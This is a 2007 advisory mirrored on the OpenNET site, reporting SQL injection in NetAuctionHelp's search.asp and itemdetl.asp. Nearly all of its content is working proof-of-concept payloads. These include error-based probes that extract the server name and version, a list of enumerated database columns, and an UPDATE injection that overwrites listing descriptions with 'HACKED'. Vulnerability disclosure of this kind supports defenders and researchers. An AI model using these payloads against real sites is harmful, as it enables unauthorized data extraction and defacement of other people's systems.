The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Aria-Security.net: NetAuctionHelp SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: 22 Nov 2007 05:46:50 -0000
From: [email protected]
To: [email protected]
Subject: Aria-Security.net: NetAuctionHelp SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Aria-Security Net
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099
------------------------
Vendor: http://www.netauctionhelp.com

PoC:
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--



tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

this code with update itemdetl.asp?id=1


Credit goes to Aria-Security.Net
Greetz: AurA


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру